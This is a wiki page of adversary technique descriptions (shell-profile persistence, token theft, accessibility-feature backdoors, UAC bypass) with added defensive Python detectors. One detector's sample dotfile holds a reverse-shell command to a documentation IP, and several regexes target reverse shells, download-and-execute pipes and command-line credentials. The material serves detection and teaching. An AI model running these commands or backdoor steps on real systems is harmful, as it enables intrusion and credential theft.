Property:Has technical description


This is a property of type Text.

Pages using the property "Has technical description"

Showing 25 pages using this property.


.bash_profile and .bashrc +<code>~/.bash_profile</code> and <code>~/.bashrc</code> are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. <code>~/.bash_profile</code> is executed for login shells and <code>~/.bashrc</code> is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), <code>~/.bash_profile</code> is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, <code>~/.bashrc</code> is executed. This allows users more fine grained control over when they want certain commands executed. Mac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling <code>~/.bash_profile</code> each time instead of <code>~/.bashrc</code>. These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell [[CiteRef::amnesia malware]].  +
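Persistence planted in these files is rarely left in <code>~/.bashrc</code> itself; it is usually hidden in a file that <code>~/.bashrc</code> sources. The following is an added example (not code from the original page) that walks the login-shell startup chain from <code>~/.bash_profile</code>, follows <code>source</code>/<code>.</code> lines, and flags the kinds of lines an adversary would add. The home directory contents, the file names under <code>~/.config</code>, and the detection rules are constructed for illustration.

```python
"""Walk the bash startup chain and flag lines an adversary would plant for persistence.

Added example with a constructed home directory; not part of the original page.
"""
import re
from typing import Dict, List, Tuple

# Constructed dotfiles keyed by path. The payload hides in a file that ~/.bashrc sources,
# so it runs on every interactive shell without appearing in ~/.bashrc itself.
FAKE_HOME: Dict[str, str] = {
    "~/.bash_profile": "export PATH=$HOME/bin:$PATH\n[ -f ~/.bashrc ] && . ~/.bashrc\n",
    "~/.bashrc": "alias ll='ls -la'\n# completion\nsource ~/.config/.cache.sh\n",
    "~/.config/.cache.sh": (
        "(nohup bash -i >& /dev/tcp/203.0.113.7/4444 0>&1 &) 2>/dev/null\n"
        "alias sudo='~/.config/.s'\n"
    ),
}

# Files it is normal for the startup chain to source; anything else hidden is worth a look.
STANDARD_RC = {".bashrc", ".bash_profile", ".bash_login", ".profile", ".bash_aliases"}
SOURCE_RE = re.compile(r"(?:^|&&|\|\||;)\s*(?:source|\.)\s+(\S+)")

# Heuristic rules (assumptions, tune for your environment).
RULES = [
    ("reverse-shell", re.compile(r"/dev/(?:tcp|udp)/|\b(?:nc|ncat|netcat)\b.*\s-e\s|\bbash\s+-i\b")),
    ("download-and-execute", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba)?sh\b")),
    ("obfuscated-payload", re.compile(r"\bbase64\s+(?:-d|--decode)\b|\beval\s+[\"']?\$\(")),
    ("shadowed-command", re.compile(r"^\s*alias\s+(?:sudo|su|ssh|passwd|gpg)=")),
    ("silenced-background-job", re.compile(r"\bnohup\b.*&\s*\)?\s*(?:2>|&>|>)\s*/dev/null")),
]


def scan_shell_startup(files: Dict[str, str], start: str = "~/.bash_profile"):
    """Follow source/. lines from `start`; return (findings, files_visited_in_order)."""
    findings: List[Tuple[str, int, str, str]] = []
    visited: List[str] = []
    queue = [start]
    while queue:
        path = queue.pop(0)
        if path in visited or path not in files:
            continue
        visited.append(path)
        for lineno, line in enumerate(files[path].splitlines(), 1):
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            for rule, pat in RULES:
                if pat.search(line):
                    findings.append((path, lineno, rule, stripped))
            m = SOURCE_RE.search(line)
            if m:
                target = m.group(1).strip("\"'").replace("$HOME/", "~/")
                base = target.rsplit("/", 1)[-1]
                if base.startswith(".") and base not in STANDARD_RC:
                    findings.append((path, lineno, "sources-hidden-file", stripped))
                queue.append(target)  # keep walking: the payload may be one more hop away
    return findings, visited


if __name__ == "__main__":
    found, seen = scan_shell_startup(FAKE_HOME)
    print("visited:", " -> ".join(seen))
    for path, lineno, rule, text in found:
        print(f"{path}:{lineno} [{rule}] {text}")
```

On a real host, replace <code>FAKE_HOME</code> with the contents of the user's dotfiles; because Terminal.app on macOS starts login shells, the chain should be walked from <code>~/.bash_profile</code> there as well as from <code>~/.bashrc</code>.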
Access Token Manipulation +Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. Microsoft itself promotes the use of access tokens as a security best practice: administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command <code>runas</code>.[[CiteRef::Microsoft runas]] Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.[[CiteRef::Pentestlab Token Manipulation]] Access tokens can be leveraged by adversaries through three methods:[[CiteRef::BlackHat Atkinson Winchester Token Manipulation]]
*'''Token Impersonation/Theft''' - An adversary creates a new access token that duplicates an existing token using <code>DuplicateToken(Ex)</code>. The token can then be used with <code>ImpersonateLoggedOnUser</code> to allow the calling thread to impersonate a logged on user's security context, or with <code>SetThreadToken</code> to assign the impersonated token to a thread. This is useful when the target user has a non-network logon session on the system.
*'''Create Process with a Token''' - An adversary creates a new access token with <code>DuplicateToken(Ex)</code> and uses it with <code>CreateProcessWithTokenW</code> to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.
*'''Make and Impersonate Token''' - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the <code>LogonUser</code> function. The function returns a copy of the new session's access token and the adversary can use <code>SetThreadToken</code> to assign the token to a thread.
Any standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. Metasploit's Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges.[[CiteRef::Metasploit access token]] The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens.[[CiteRef::Cobalt Strike Access Token]]  +
Accessibility Features +Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times, and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen.[[CiteRef::FireEye Hikit Rootkit]] Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP).[[CiteRef::DEFCON2016 Sticky Keys]] The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods: For simple binary replacement on Windows XP and later as well as Windows Server 2003/R2 and later, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access).
Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [[Technique/T1076|Remote Desktop Protocol]] will cause the replaced file to be executed with SYSTEM privileges.[[CiteRef::Tilbury 2014]] For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified (the <code>Debugger</code> value under <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[program]</code>) that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges.[[CiteRef::Tilbury 2014]] Other accessibility features exist that may also be leveraged in a similar fashion:[[CiteRef::DEFCON2016 Sticky Keys]]
*On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
*Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
*Narrator: <code>C:\Windows\System32\Narrator.exe</code>
*Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
*App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>  +
Account Discovery +Adversaries may attempt to get a listing of local system or domain accounts. ===Windows=== Example commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the [[Software/S0039|Net]] utility or through use of [[Software/S0105|dsquery]]. If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [[Technique/T1033|System Owner/User Discovery]] may apply. ===Mac=== On macOS, groups can be enumerated through the <code>groups</code> and <code>id</code> commands, and <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users (<code>dscl . list /Users</code> lists local users). On macOS the <code>/etc/passwd</code> file, together with <code>/etc/master.passwd</code>, is only consulted in single-user mode; normal logins are resolved through Directory Services, which is why the <code>dscl</code> and <code>dscacheutil</code> queries are needed there. ===Linux=== On Linux, local users can be enumerated through the <code>/etc/passwd</code> file, which is world readable, and groups through <code>/etc/group</code> or the <code>groups</code> and <code>id</code> commands.  +
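As an added example (not from the original page), the following parses constructed <code>/etc/passwd</code> and <code>/etc/group</code> contents the way a Linux discovery step does and answers the questions an adversary, or a defender baselining a host, actually asks: which accounts can log in interactively, which are human users, whether any account besides <code>root</code> has UID 0, and who is in the privileged groups. The account names and the UID cut-off of 1000 are assumptions (the cut-off is distribution-specific).

```python
"""Enumerate local accounts from /etc/passwd and /etc/group as a discovery step would.

Added example with constructed files; not part of the original page.
"""
from typing import Dict, List, Set

# Constructed /etc/passwd: name:password:UID:GID:GECOS:home:shell
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:Alice Example:/home/alice:/bin/bash
bob:x:1001:27:Bob Example:/home/bob:/bin/zsh
svc_backup:x:1002:34:backup service:/var/backups:/bin/false
toor:x:0:0:maintenance:/root:/bin/sh
"""

# Constructed /etc/group: name:password:GID:member,member
SAMPLE_GROUP = """root:x:0:
adm:x:4:alice,bob
wheel:x:10:
sudo:x:27:alice
backup:x:34:svc_backup
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}
PRIVILEGED_GROUPS = ("sudo", "wheel", "admin", "adm")  # assumption: privileged on this host


def parse_passwd(text: str) -> List[Dict[str, object]]:
    """Parse passwd(5) lines into dicts; the shell field is everything after the sixth colon."""
    users = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, uid, gid, gecos, home, shell = line.split(":", 6)
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def parse_group(text: str) -> Dict[str, Dict[str, object]]:
    """Parse group(5) lines into {name: {gid, members}}; members is the explicit list only."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, gid, members = line.split(":", 3)
        groups[name] = {"gid": int(gid), "members": set(filter(None, members.split(",")))}
    return groups


def members_of(group: str, users, groups) -> Set[str]:
    """Explicit members plus users whose primary GID is the group, which /etc/group alone omits."""
    if group not in groups:
        return set()
    gid = groups[group]["gid"]
    return set(groups[group]["members"]) | {u["name"] for u in users if u["gid"] == gid}


def account_report(passwd_text: str, group_text: str, uid_min: int = 1000) -> Dict[str, object]:
    """Summarise who can log in, who is human, extra UID-0 accounts and privileged group membership."""
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    interactive = [u for u in users if u["shell"] not in NOLOGIN_SHELLS]
    return {
        "interactive": [u["name"] for u in interactive],
        "humans": [u["name"] for u in interactive if u["uid"] >= uid_min],
        "extra_uid0": [u["name"] for u in users if u["uid"] == 0 and u["name"] != "root"],
        "privileged": {g: sorted(members_of(g, users, groups)) for g in PRIVILEGED_GROUPS if g in groups},
    }


if __name__ == "__main__":
    for section, value in account_report(SAMPLE_PASSWD, SAMPLE_GROUP).items():
        print(f"{section}: {value}")
```

Note that <code>bob</code> is reported as a member of <code>sudo</code> although he is not listed in the <code>sudo</code> line of <code>/etc/group</code>: his primary GID is 27, which tools that only grep <code>/etc/group</code> miss, and which a second UID-0 account such as <code>toor</code> is the other classic thing to look for.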
Account Manipulation +Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.  +
AppCert DLLs +Dynamic-link libraries (DLLs) that are specified as values under the AppCertDlls Registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions:[[CiteRef::Engame Process Injection July 2017]]
*CreateProcess
*CreateProcessAsUser
*CreateProcessWithLoginW
*CreateProcessWithTokenW
*WinExec
Similar to [[Technique/T1055|Process Injection]], this key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.  +
AppInit DLLs +Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library.[[CiteRef::Engame Process Injection July 2017]] Similar to [[Technique/T1055|Process Injection]], these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.[[CiteRef::AppInit Registry]] The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.[[CiteRef::AppInit Secure Boot]]  +
AppleScript +macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Adversaries can use this to interact with open SSH connections, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well, such as a reverse shell via python.[[CiteRef::Macro Malware Targets Macs]] Scripts can be run from the command line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>.  +
Application Deployment Software +Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.  +
Application Shimming +The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that they will work with Windows 10.[[CiteRef::Engame Process Injection July 2017]] Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [[Technique/T1179|Hooking]] to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* <code>%WINDIR%\AppPatch\sysmain.sdb</code>
* <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>
Custom databases are stored in:
* <code>%WINDIR%\AppPatch\Custom</code> and <code>%WINDIR%\AppPatch\AppPatch64\Custom</code>
* <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel, and administrator privileges are required to install a shim. However, certain shims can be used to [[Technique/T1088|Bypass User Account Control]] (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structured Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [[Technique/T1179|Hooking]], utilizing these shims may allow an adversary to perform several malicious acts such as elevating privileges, installing backdoors, disabling defenses like Windows Defender, etc.  +
Application Window Discovery +Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. In Mac, this can be done natively with a small [[Technique/T1155|AppleScript]] script.  +
Audio Capture +An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information. Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.  +
Authentication Package +Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.[[CiteRef::MSDN Authentication Packages]] Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=<target binary></code>. The binary will then be executed by the system when the authentication packages are loaded.  +
Automated Collection +Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [[Technique/T1064|Scripting]] to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [[Technique/T1083|File and Directory Discovery]] and [[Technique/T1105|Remote File Copy]] to identify and move files.  +
Automated Exfiltration +Data, such as sensitive documents, may be exfiltrated through the use of automated processing or [[Technique/T1064|Scripting]] after being gathered during [[Collection]]. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [[Technique/T1041|Exfiltration Over Command and Control Channel]] and [[Technique/T1048|Exfiltration Over Alternative Protocol]].  +
BITS Jobs +Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)[[CiteRef::Microsoft COM]].[[CiteRef::Microsoft BITS]] BITS is commonly used by updaters, messengers, and other applications that prefer to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through [[Technique/T1086|PowerShell]] [[CiteRef::Microsoft BITS]] and the [[Software/S0190|BITSAdmin]] tool.[[CiteRef::Microsoft BITSAdmin]] Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and are often permitted by host firewalls.[[CiteRef::CTU BITS Malware June 2016]][[CiteRef::Mondok Windows PiggyBack BITS May 2007]][[CiteRef::Symantec BITS May 2007]] BITS-enabled execution may also allow [[Persistence]] by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).[[CiteRef::PaloAlto UBoatRAT Nov 2017]][[CiteRef::CTU BITS Malware June 2016]] BITS upload functionality can also be used to perform [[Technique/T1048|Exfiltration Over Alternative Protocol]].[[CiteRef::CTU BITS Malware June 2016]]  +
Bash History +Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials.[[CiteRef::External to DA, the OS X Way]]  +
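The credentials described above are easy to miss by eye because they sit in the middle of ordinary command lines. As an added example (not from the original page), the following parses a constructed <code>~/.bash_history</code>, including the <code>#&lt;epoch&gt;</code> lines bash writes when <code>HISTTIMEFORMAT</code> is set, and pulls out secrets passed as arguments to common tools. The hostnames, account names and passwords in the sample are made up, and the set of patterns is an assumption to extend for the tools in use on a given host.

```python
"""Triage a bash history file for credentials passed on the command line.

Added example with constructed data; not part of the original page.
"""
import re
from typing import List, Optional, Tuple

# Constructed ~/.bash_history. The '#<epoch>' lines are what bash writes when HISTTIMEFORMAT is set.
SAMPLE_HISTORY = """#1700000001
ls -la /var/www
#1700000002
mysql -u root -pS3cretPass! -h db01 inventory
#1700000003
sshpass -p 'hunter2' ssh deploy@10.0.0.5
#1700000004
curl -u admin:Adm1nP@ss https://intranet.example/api/health
#1700000005
export DB_PASSWORD=Sup3rSecret
#1700000006
smbclient //fs01/finance -U svc_backup%B@ckup2024
#1700000007
git pull
"""

# (label, regex) pairs; every pattern captures the secret in its last non-empty group.
CREDENTIAL_PATTERNS = [
    ("--password= on the command line", re.compile(r"--password[= ](\S+)")),
    ("mysql -p<password>", re.compile(r"\bmysql\b.*\s-p(?!\s)(\S+)")),
    ("sshpass -p", re.compile(r"\bsshpass\s+-p\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))")),
    ("curl/wget -u user:pass", re.compile(r"\b(?:curl|wget)\b.*\s(?:-u|--user)[= ](\S*?):(\S+)")),
    ("secret exported as env var", re.compile(r"\bexport\s+\w*(?:PASS|SECRET|TOKEN)\w*=(\S+)")),
    ("smbclient -U user%pass", re.compile(r"\bsmbclient\b.*\s-U\s*(\S*?)%(\S+)")),
]


def parse_history(text: str) -> List[Tuple[Optional[int], str]]:
    """Return (timestamp, command) pairs; timestamp is None when no '#<epoch>' line preceded it."""
    entries, ts = [], None
    for line in text.splitlines():
        if re.fullmatch(r"#\d+", line):
            ts = int(line[1:])
        elif line.strip():
            entries.append((ts, line))
            ts = None
    return entries


def find_credentials(text: str) -> List[Tuple[Optional[int], str, str, str]]:
    """Return (timestamp, pattern label, secret, redacted command) for each leaked credential."""
    hits = []
    for ts, cmd in parse_history(text):
        for label, pat in CREDENTIAL_PATTERNS:
            m = pat.search(cmd)
            if m:
                secret = next(g for g in reversed(m.groups()) if g)
                # report a redacted copy so the finding itself does not re-leak the secret
                hits.append((ts, label, secret, cmd.replace(secret, "*" * len(secret))))
                break  # one report per command line
    return hits


if __name__ == "__main__":
    for ts, label, _, redacted in find_credentials(SAMPLE_HISTORY):
        print(f"{ts} [{label}] {redacted}")
```

The same scan is worth running over <code>~/.zsh_history</code>, <code>~/.mysql_history</code> and <code>~/.psql_history</code> on hosts where those shells and clients are in use, since they keep history in the same spirit.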
Binary Padding +Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.  +
Bootkit +A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR).[[CiteRef::MTrends 2016]] Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. ===Master Boot Record=== The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.[[CiteRef::Lau 2011]] ===Volume Boot Record=== The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.  +
Browser Bookmark Discovery +Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure. Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [[Technique/T1081|Credentials in Files]] associated with logins cached by a browser. Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.  +
Browser Extensions +Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.[[CiteRef::Wikipedia Browser Extension]][[CiteRef::Chrome Extensions Definition]] Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores, so it may not be difficult for malicious extensions to defeat automated scanners and be uploaded.[[CiteRef::Malicious Chrome Extension Numbers]] Once the extension is installed, it can browse to websites in the background,[[CiteRef::Chrome Extension Crypto Miner]][[CiteRef::ICEBRG Chrome Extensions]] steal all information that a user enters into a browser, including credentials,[[CiteRef::Banker Google Chrome Extension Steals Creds]][[CiteRef::Catch All Chrome Extension]] and be used as an installer for a RAT for [[persistence]]. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions.[[CiteRef::Stantinko Botnet]] There have also been similar examples of extensions being used for command & control.[[CiteRef::Chrome Extension C2 Malware]]  +
Brute Force +Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained. [[Technique/T1003|Credential Dumping]] to obtain password hashes may only get an adversary so far when [[Technique/T1075|Pass the Hash]] is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network.[[CiteRef::Wikipedia Password cracking]] Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.[[CiteRef::Cylance Cleaver]] A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.[[CiteRef::BlackHillsInfosec Password Spraying]]  +
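The distinction drawn above between brute forcing one account and spraying one password across many accounts is exactly what a detection needs to encode: a sprayer deliberately stays below the lockout threshold per account, so counting failures per account sees nothing, while counting distinct accounts per source does. The following is an added example (not from the original page) that classifies constructed failed-logon records, modelled on the fields of Windows event 4625, per source address. The addresses, account names and the thresholds are assumptions; the window and per-account limit should be set from the domain's lockout policy (threshold and observation window).

```python
"""Separate password spraying from single-account brute force in failed-logon telemetry.

Added example on constructed events; not part of the original page.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed failed logons: (timestamp, target account, source address). Not from a real environment.
_T0 = datetime(2024, 3, 1, 9, 0, 0)
FAILED_LOGONS: List[Tuple[datetime, str, str]] = (
    # one password tried once against 12 accounts: stays under any lockout threshold
    [(_T0 + timedelta(seconds=30 * i), f"user{i:02d}", "10.0.0.50") for i in range(12)]
    # classic brute force: 30 guesses against one account in five minutes
    + [(_T0 + timedelta(seconds=10 * i), "jsmith", "10.0.0.77") for i in range(30)]
    # a user who mistyped twice
    + [(_T0, "alice", "10.0.0.9"), (_T0 + timedelta(seconds=20), "alice", "10.0.0.9")]
)


def classify_sources(
    events: List[Tuple[datetime, str, str]],
    window: timedelta = timedelta(minutes=30),  # assumption: the lockout observation window
    spray_min_accounts: int = 8,                # distinct accounts from one source inside the window
    spray_max_per_account: int = 3,             # sprayers stay below the lockout threshold per account
    brute_min_attempts: int = 10,               # repeated guesses at a single account
) -> Dict[str, Tuple[str, Dict[str, int]]]:
    """Return {source: (verdict, stats)}; verdict is 'password-spray', 'brute-force' or 'normal'."""
    by_source: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, account, source in events:
        by_source[source].append((ts, account))
    results: Dict[str, Tuple[str, Dict[str, int]]] = {}
    for source, evs in by_source.items():
        evs.sort()
        verdict = "normal"
        stats = {"accounts": 0, "max_per_account": 0}
        for i, (t_end, _) in enumerate(evs):
            # examine every window that ends on an event; O(n^2) is fine per source
            counts = Counter(a for t, a in evs[: i + 1] if t >= t_end - window)
            accounts, worst = len(counts), max(counts.values())
            stats["accounts"] = max(stats["accounts"], accounts)
            stats["max_per_account"] = max(stats["max_per_account"], worst)
            if accounts >= spray_min_accounts and worst <= spray_max_per_account:
                verdict = "password-spray"
            elif worst >= brute_min_attempts and verdict != "password-spray":
                verdict = "brute-force"
        results[source] = (verdict, stats)
    return results


if __name__ == "__main__":
    for source, (verdict, stats) in classify_sources(FAILED_LOGONS).items():
        print(f"{source}: {verdict} {stats}")
```

Because a spray is often distributed across several source addresses, the same windowing is worth repeating with the source key replaced by a coarser one (a subnet, or the workstation name from the event) before concluding a quiet domain has no spraying going on.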
Bypass User Account Control +Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.[[CiteRef::TechNet How UAC Works]] If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box.[[CiteRef::TechNet Inside UAC]][[CiteRef::MSDN COM Elevation]] An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.[[CiteRef::Davidson Windows]] Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected. Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods[[CiteRef::Github UACMe]] that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. 
Additional bypass methods are regularly discovered and some used in the wild, such as: * <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.[[CiteRef::enigma0x3 Fileless UAC Bypass]][[CiteRef::Fortinet Fareit]] Another bypass is possible through some [[Lateral Movement]] techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity.[[CiteRef::SANS UAC Bypass]]  +
